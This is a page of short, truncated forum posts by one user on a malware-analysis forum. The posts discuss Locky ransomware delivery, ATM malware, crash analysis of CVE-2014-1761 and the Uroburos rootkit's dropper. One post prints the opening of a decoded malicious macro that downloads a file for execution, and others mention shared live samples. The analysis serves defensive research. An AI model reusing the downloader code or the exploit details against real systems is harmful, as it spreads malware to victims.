A forum for reverse engineering, OS internals and malware analysis 


Re: ATM Malware JackPot v2

 by frank_boldewin ¦  Tue Jul 24, 2018 9:48 am ¦  Forum: Malware ¦  Topic: ATM Malware JackPot v2 ¦  Replies: 7 ¦  Views: 5346

Does the sample work for you?
On my machines it always crashes.

Re: Locky ransomware

 by frank_boldewin ¦  Wed May 11, 2016 7:39 pm ¦  Forum: Malware ¦  Topic: Locky ransomware ¦  Replies: 142 ¦  Views: 203693

Just analysed a new way Locky tries to install on systems. Very small zip-files (<1000 Bytes), after unzipping there's a rar-file and inside this one a .vbe (encrypted .vbs file). The vbs file tries to download and run a locky dropper. Several AV-Scanners suck to detect this. Encrypted .vbe file '**...

Re: Locky ransomware

 by frank_boldewin ¦  Wed Feb 24, 2016 2:14 pm ¦  Forum: Malware ¦  Topic: Locky ransomware ¦  Replies: 142 ¦  Views: 203693

Just in case one is interested, attached is an unpacked version of locky.

Re: Locky ransomware

 by frank_boldewin ¦  Tue Feb 23, 2016 4:23 pm ¦  Forum: Malware ¦  Topic: Locky ransomware ¦  Replies: 142 ¦  Views: 203693

Seems like it stopped working. Servers taken down? maddog4012's doc file starts a macro with some obfuscated vb-code and decodes to following code: function downloadToFile(url,file) { var xhr=new ActiveXObject("msxml2.xmlhttp"); ado=new ActiveXObject("ADODB.Stream"); xhr.open("GET",url,false); xhr.s...

Re: [2015-08-04]ARK for Windows x64: WIN64AST(Page8#78)

 by frank_boldewin ¦  Fri Aug 07, 2015 10:14 am ¦  Forum: Tools/Software ¦  Topic: [2017-11-05]ARK for Windows X64: WIN64AST(Page10#96) ¦  Replies: 99 ¦  Views: 351053

I like your tool, though some features are hardly missing.

complete process + driver dump incl. pe-fixing
memory map (VAD) view for processes including page protections as well as dumping individual pages.

Re: CVE-2015-0311

 by frank_boldewin ¦  Mon Jan 26, 2015 8:13 am ¦  Forum: Malware ¦  Topic: CVE-2015-0311 ¦  Replies: 15 ¦  Views: 13249

Does one of these samples trigger something on your site?

Re: Automated Malware Environments

 by frank_boldewin ¦  Sat Dec 13, 2014 4:42 pm ¦  Forum: Malware ¦  Topic: Automated Malware Environments ¦  Replies: 12 ¦  Views: 9872

Cuckoo supports VBOX, VMWARE and QEMU KVM. Further it has support for Volatility. The latest version has a branch to a new API-Monitor, which will integrate in the master branch in the near future. Another plugin is zer0m0n from conix-security which supports kernel hooks and some antivm stuff. And ye...

Re: JD-GUI (Free Java Decompiler)

 by frank_boldewin ¦  Sat May 10, 2014 11:37 am ¦  Forum: Tools/Software ¦  Topic: JD-GUI (Free Java Decompiler) ¦  Replies: 6 ¦  Views: 10561

Re: CVE-2014-1761

 by frank_boldewin ¦  Fri Apr 04, 2014 1:44 pm ¦  Forum: Malware ¦  Topic: CVE-2014-1761 ¦  Replies: 11 ¦  Views: 7297

Sample tested on Windows 7 en - Office 2007 SP3 ---> crash from the stack rewind we can see it triggered the bug and jumped to the first ROP call at 0x275a48e8 (RET at 0x275a48f6) and that a function in wwlib.dll seems to be the source of the bug. 0:000> kb ChildEBP RetAddr Args to Child WARNING: Fr...

Re: Uroburos rootkit

 by frank_boldewin ¦  Mon Mar 03, 2014 5:29 pm ¦  Forum: Malware ¦  Topic: WinNT/Turla (WinNT/Pfinet, Uroburos rootkit) ¦  Replies: 66 ¦  Views: 256666

Yesterday I wrote on facebook that the Uroboros malware reminds me of a similar case back in 2008. Now I'm pretty sure. When the dropper executes first it checks if it runs on a 32bit or 64bit system to select what driver to drop later. It creates a directory $NtUninstallQ817473 inside the windows d...
